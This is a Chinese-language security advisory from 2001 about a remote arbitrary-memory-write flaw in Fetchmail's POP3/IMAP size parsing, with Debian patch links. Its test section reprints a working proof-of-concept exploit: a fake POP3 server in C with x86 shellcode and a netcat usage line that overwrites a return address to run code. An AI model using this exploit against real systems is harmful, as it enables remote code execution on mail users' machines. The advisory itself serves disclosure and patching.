发布日期：2001-08-10
更新日期：2001-08-10

受影响系统：

Fetchmail <5.8.17
  - Debian Linux 2.2 alias potato

描述：

---

Fetchmail存在两个远程安全漏洞，它们分别存在pop3.c和imap.c中。这两个漏洞是非常
相似的。攻击者可以将任意的4字节写到任意内存地址中。

有问题的代码如下(imap.c中有相似的代码)：

pop3.c:

static int pop3_getsizes(int sock, int count, int *sizes)
[snip]
        while ((ok = gen_recv(sock, buf, sizeof(buf))) == 0)
        {
            int num, size;

            if (DOTLINE(buf))
                break;
            else if (sscanf(buf, "%d %d", &num, &size) == 2)
                sizes[num - 1] = size;
        }
[snip]

上面代码使用sscanf从pop3(imap)服务器的应答数据中获取两个整型数据：num和size.
然后将size保存到sizes[num-1]中。因此，如果攻击者可以控制或者伪造服务器应答数据
的话，就可以控制num和size的数值，从而重写任意内存地址的内容，例如函数返回地址。

攻击者需要控制一台imap/pop3服务器，当远程用户使用fetchmail收取邮件时，攻击者
就可能以该远程用户的身份在其主机上执行任意代码。攻击者也可以利用DNS欺骗等方法
来进行攻击。

<*来源：Salvatore Sanfilippo (antirez@invece.org) *>


测试方法：

---

警 告

以下程序(方法)可能带有攻击性，仅供安全研究与教学之用。使用者风险自负！

Salvatore Sanfilippo (antirez@invece.org)提供了如下测试代码：

/* fetchmail proof of concepts i386 exploit
* Copyright (C) 2001 Salvatore Sanfilippo <antirez@invece.org>
* Code under the GPL license.
*
* Usage: ./a.out | nc -l -p 3333
* fetchmail localhost -P 3333 -p POP3
*
* This is a bad exploit with offset carefully selected
* to work in my own system. It will probably not work in
* your system if you don't modify RETR_OFFSET and SHELL_PTR,
* but you may try to set the SHELL_PTR to 0xAAAAAAAA
* and use gdb to obtain the proof that your fetchmail is vulnerable
* without to exploit it.
* Or just read the code in pop3.c.
*
* To improve the exploit portability you may put the shellcode inside
* one of the static char buffers, grep 'static char' *.c.
*
* Tested on fetchmail 5.8.15 running on Linux 2.4.6
*
* On success you should see the ls output.
*/

#include <stdio.h>

#define MESSAGES 10
#define RETR_OFFSET -20
#define SHELL_PTR 0xbfffba94

int main(void)
{
    int ish = SHELL_PTR;
    int ret_offset = -10;
    char shellcode[] = /* take the shellcode multiple of 4 in size */
    "\xeb\x1f\x5e\x89\x76\x08\x31\xc0\x88\x46\x07\x89\x46\x0c\xb0\x0b"
    "\x89\xf3\x8d\x4e\x08\x8d\x56\x0c\xcd\x80\x31\xdb\x89\xd8\x40\xcd"
    "\x80\xe8\xdc\xff\xff\xff/bin/ls\0\0";
    int *sc = (int*) shellcode;
    int noop = 0x90909090;
    int i;

    /* +OK for user and password, than report the number of messages */
    printf("+OK\r\n+OK\r\n+OK\r\n+OK %d 0\r\n+OK 0\r\n+OK\r\n", MESSAGES);
    /* Overwrite the RET pointer */
    for (i = ret_offset-20; i < ret_offset+20; i++)
        printf("%d %d\r\n", i, ish);
    /* Put some NOP */
    for (i = 1; i < 21; i++)
        printf("%d %d\r\n", i, noop);
    /* Put the shell code in the buffer */
    for (i = 21; i < 21+(sizeof(shellcode)/4); i++)
        printf("%d %d\r\n", i, *sc++);
    printf(".\r\n"); /* POP data term */
    return 0;
}




建议：

---

厂商补丁：

1. fetchmail 5.8.17已经修复了这个漏洞，您可以在厂商主页上下载最新版本：
http://www.tuxedo.org/~esr/fetchmail/


2. Debian Linux (http://www.debian.org/security/)为此发布了一份安全公告 ：
DSA-071-1  fetchmail remote exploit
http://www.debian.org/security/2001/dsa-071

补丁下载 -
________________________________________________________________________

Debian GNU/Linux 2.2 alias potato

  Potato was released for alpha, arm, i386, m68k, powerpc and sparc.

  Source archives:
    http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.diff.gz
      MD5 checksum: a1ba0691be21e100b10beded89813911
    http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3-3.dsc
      MD5 checksum: b49e9eacda18f237ae066f085647d3f7
    http://security.debian.org/dists/stable/updates/main/source/fetchmail_5.3.3.orig.tar.gz
      MD5 checksum: d2cffc4594ec2d36db6681b800f25e2a

  Architecture independent archives:
    http://security.debian.org/dists/stable/updates/main/binary-all/fetchmailconf_5.3.3-3_all.deb
      MD5 checksum: 223c6590b7495a41d4743d526222bc4f

  Alpha architecture:
    http://security.debian.org/dists/stable/updates/main/binary-alpha/fetchmail_5.3.3-3_alpha.deb
      MD5 checksum: 75249ba9604e732e07a1b2147b6e155e

  ARM architecture:
    http://security.debian.org/dists/stable/updates/main/binary-arm/fetchmail_5.3.3-3_arm.deb
      MD5 checksum: 80a201b1e25ff5c301ccfd2cbfa6cd8e

  Intel IA-32 architecture:
    http://security.debian.org/dists/stable/updates/main/binary-i386/fetchmail_5.3.3-3_i386.deb
      MD5 checksum: 1d9e300f957b35486e2aefcff87e43c7

  Motorola 680x0 architecture:
    http://security.debian.org/dists/stable/updates/main/binary-m68k/fetchmail_5.3.3-3_m68k.deb
      MD5 checksum: 9bdf5c4712b7dec94f644e58635bee9b

  PowerPC architecture:
    http://security.debian.org/dists/stable/updates/main/binary-powerpc/fetchmail_5.3.3-3_powerpc.deb
      MD5 checksum: 1f97930cf7c8c4442362d6c5f27465cb

  Sun Sparc architecture:
    http://security.debian.org/dists/stable/updates/main/binary-sparc/fetchmail_5.3.3-3_sparc.deb
      MD5 checksum: fb060d4e74f6f1a84823829a21d54b19



浏览次数：4875
严重程度：0（网友投票）